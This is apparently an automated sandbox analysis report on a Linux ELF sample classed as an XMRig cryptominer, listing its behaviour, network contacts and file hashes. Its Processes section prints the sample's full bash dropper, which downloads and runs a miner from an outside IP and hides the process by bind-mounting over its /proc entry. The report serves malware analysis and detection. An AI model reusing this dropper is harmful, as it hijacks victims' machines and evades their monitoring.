Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-b2ke1ayeqa
Target 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
SHA256 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282
Tags xmrig antivm defense_evasion discovery miner
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282

Threat Level: Known bad

The file 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf was found to be: Known bad.

Malicious Activity Summary

xmrig antivm defense_evasion discovery miner

XMRig Miner payload

xmrig

Executes dropped EXE

File and Directory Permissions Modification

Checks hardware identifiers (DMI)

Enumerates running processes

Reads hardware information

Reads CPU attributes

Checks CPU configuration

Enumerates kernel/hardware configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 01:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 01:38

Reported

2024-10-18 01:41

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /root/.sysemd/sysemd /root/.sysemd/sysemd N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /root/.sysemd/sysemd N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /root/.sysemd/sysemd N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /root/.sysemd/sysemd N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/possible /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/top N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/online /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type /root/.sysemd/sysemd N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/cgroup/cpuset.mems.effective /root/.sysemd/sysemd N/A
File opened for reading /sys/kernel/mm/hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu /usr/bin/top N/A
File opened for reading /sys/fs/cgroup/cgroup.controllers /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/online /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/meminfo /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/cpumap /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node /usr/bin/top N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency /root/.sysemd/sysemd N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /root/.sysemd/sysemd N/A
File opened for reading /sys/firmware/dmi/tables/DMI /root/.sysemd/sysemd N/A
File opened for reading /sys/fs/cgroup/cpuset.cpus.effective /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/meminfo /usr/bin/top N/A
File opened for reading /sys/bus/dax/devices /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access1/initiators /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency /root/.sysemd/sysemd N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1077/statm /usr/bin/top N/A
File opened for reading /proc/1096/stat /usr/bin/top N/A
File opened for reading /proc/1111/stat /usr/bin/top N/A
File opened for reading /proc/1205/stat /usr/bin/top N/A
File opened for reading /proc/1209/statm /usr/bin/top N/A
File opened for reading /proc/1271/stat /usr/bin/top N/A
File opened for reading /proc/19/stat /usr/bin/top N/A
File opened for reading /proc/93/stat /usr/bin/top N/A
File opened for reading /proc/109/statm /usr/bin/top N/A
File opened for reading /proc/521/statm /usr/bin/top N/A
File opened for reading /proc/584/statm /usr/bin/top N/A
File opened for reading /proc/771/stat /usr/bin/top N/A
File opened for reading /proc/967/stat /usr/bin/top N/A
File opened for reading /proc/979/stat /usr/bin/top N/A
File opened for reading /proc/25/statm /usr/bin/top N/A
File opened for reading /proc/94/stat /usr/bin/top N/A
File opened for reading /proc/1197/stat /usr/bin/top N/A
File opened for reading /proc/1030/statm /usr/bin/top N/A
File opened for reading /proc/1311/statm /usr/bin/top N/A
File opened for reading /proc/1326/statm /usr/bin/top N/A
File opened for reading /proc/95/stat /usr/bin/top N/A
File opened for reading /proc/590/stat /usr/bin/top N/A
File opened for reading /proc/404/statm /usr/bin/top N/A
File opened for reading /proc/1160/statm /usr/bin/top N/A
File opened for reading /proc/1180/statm /usr/bin/top N/A
File opened for reading /proc/1398/stat /usr/bin/top N/A
File opened for reading /proc/76/stat /usr/bin/top N/A
File opened for reading /proc/89/statm /usr/bin/top N/A
File opened for reading /proc/85/stat /usr/bin/top N/A
File opened for reading /proc/215/statm /usr/bin/top N/A
File opened for reading /proc/307/stat /usr/bin/top N/A
File opened for reading /proc/412/statm /usr/bin/top N/A
File opened for reading /proc/629/stat /usr/bin/top N/A
File opened for reading /proc/1632/stat /usr/bin/top N/A
File opened for reading /proc/self/auxv /usr/bin/top N/A
File opened for reading /proc/27/stat /usr/bin/top N/A
File opened for reading /proc/85/statm /usr/bin/top N/A
File opened for reading /proc/93/statm /usr/bin/top N/A
File opened for reading /proc/664/stat /usr/bin/top N/A
File opened for reading /proc/1041/stat /usr/bin/top N/A
File opened for reading /proc/1398/statm /usr/bin/top N/A
File opened for reading /proc/1426/statm /usr/bin/top N/A
File opened for reading /proc/self/stat /usr/bin/top N/A
File opened for reading /proc/8/statm /usr/bin/top N/A
File opened for reading /proc/1640/statm /usr/bin/top N/A
File opened for reading /proc/112/stat /usr/bin/top N/A
File opened for reading /proc/588/stat /usr/bin/top N/A
File opened for reading /proc/633/stat /usr/bin/top N/A
File opened for reading /proc/839/statm /usr/bin/top N/A
File opened for reading /proc/1055/stat /usr/bin/top N/A
File opened for reading /proc/1118/statm /usr/bin/top N/A
File opened for reading /proc/17/stat /usr/bin/top N/A
File opened for reading /proc/81/statm /usr/bin/top N/A
File opened for reading /proc/1590/statm /usr/bin/top N/A
File opened for reading /proc/1641/statm /usr/bin/top N/A
File opened for reading /proc/1155/statm /usr/bin/top N/A
File opened for reading /proc/1188/stat /usr/bin/top N/A
File opened for reading /proc/1077/stat /usr/bin/top N/A
File opened for reading /proc/1281/statm /usr/bin/top N/A
File opened for reading /proc/216/stat /usr/bin/top N/A
File opened for reading /proc/628/statm /usr/bin/top N/A
File opened for reading /proc/109/stat /usr/bin/top N/A
File opened for reading /proc/113/statm /usr/bin/top N/A
File opened for reading /proc/958/stat /usr/bin/top N/A

Processes

/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/bin/bash

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c exec '/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf' "$@" /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/bin/bash

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c
#!/bin/bash
cpu_num=`grep -c "model name" /proc/cpuinfo`
cpu_used=`expr $cpu_num / 2`
#echo $s
dir=$(pwd)
if [ `whoami` = "root" ];then
cd ~ && mkdir .sysemd >/dev/null 2>&1
cd .sysemd >/dev/null 2>&1
rm -f go.sh sysemd >/dev/null 2>&1
n=$(cat .num)
kill -9 $n >/dev/null 2>&1
curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh && chmod +x go.sh
sleep 1
sed -i "3s/20/${cpu_used}/" go.sh
curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd && chmod +x sysemd
sleep 1
sh go.sh
sleep 3
pid=$(top -b -n1 | grep sysemd | head -1 | awk '{print $1}')
echo $pid > .num
mount -o bind /tmp /proc/$pid >/dev/null 2>&1
rm -f go.sh sysemd >/dev/null 2>&1
fi
/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/usr/bin/grep

[grep -c model name /proc/cpuinfo]

/usr/bin/expr

[expr 1 / 2]

/usr/bin/whoami

[whoami]

/usr/bin/mkdir

[mkdir .sysemd]

/usr/bin/rm

[rm -f go.sh sysemd]

/usr/bin/cat

[cat .num]

/usr/bin/curl

[curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh]

/usr/bin/chmod

[chmod +x go.sh]

/usr/bin/sleep

[sleep 1]

/usr/bin/sed

[sed -i 3s/20/0/ go.sh]

/usr/bin/curl

[curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd]

/usr/bin/chmod

[chmod +x sysemd]

/usr/bin/sleep

[sleep 1]

/usr/bin/sh

[sh go.sh]

/root/.sysemd/sysemd

[./sysemd -o 104.168.101.23:34512 -t 0 -p xm3 --randomx-1gb-pages -k -B]

/usr/bin/sleep

[sleep 3]

/usr/bin/grep

[grep sysemd]

/usr/bin/top

[top -b -n1]

/usr/bin/head

[head -1]

/usr/bin/awk

[awk {print $1}]

/usr/bin/mount

[mount -o bind /tmp /proc/1632]

/usr/bin/rm

[rm -f go.sh sysemd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 104.168.101.23:1234 104.168.101.23 tcp
US 104.168.101.23:1234 104.168.101.23 tcp
US 104.168.101.23:34512 N/A tcp

Files

/root/.sysemd/go.sh

MD5 496b34eb065a5f2a4b2455f207d890b2
SHA1 dc170fb3d571ef0b238e33fcae8c2bc50e1e4fd1
SHA256 728055874a80558d3900fded78c97584d4728e1bd9124db9d20b8953edacb8c4
SHA512 f9774855d64f46b232f93601430db18bd470067372a09c3933d19ca19658eb21d9c6d4f4d1ef49a7e1d0526e6f67d40d9e33e54c8f0867050c0d348635b19e47

/root/.sysemd/sedK5Ug6t

MD5 6bcf2d2ea1ceb1766c5bfbf8728a57e3
SHA1 e542eee55d92c4f5e3fbb86c244edf04afdfee22
SHA256 53bff9f21bdaa669c662f3d9c3a4d7f236e063f75ce418874d55674ea6125796
SHA512 00d0dd6643a22d7e63a559a5dd7f48cd61f26a5c214e308fbd3dcb6a1238d553f89f7af51a92465004b117b9cd08c1df2c2e46875f5a8f61ed467dc87cd9b598

/root/.sysemd/sysemd

MD5 8f633ade35df4f992eb28a2c5bc37cef
SHA1 6b2fe529339896b22328dec8936219e7b8e3252f
SHA256 364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
SHA512 8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73

/root/.sysemd/.num

MD5 679359fe74d809a6564f60e75585ed3b
SHA1 7f114e9dc091154c365576d4702a63392f88704e
SHA256 d05dd95f7ec068988015cb6c4536510191eaba0ebbd7a6c9feb55c73650cc698
SHA512 9b493b0a9a67bcb95df947fc628ab7366ed6f5136267782dc0c967063244b5e4acacc32a22242b8fc506f22cdfe91eb802165e4c7d12e07de79563453f3e05a7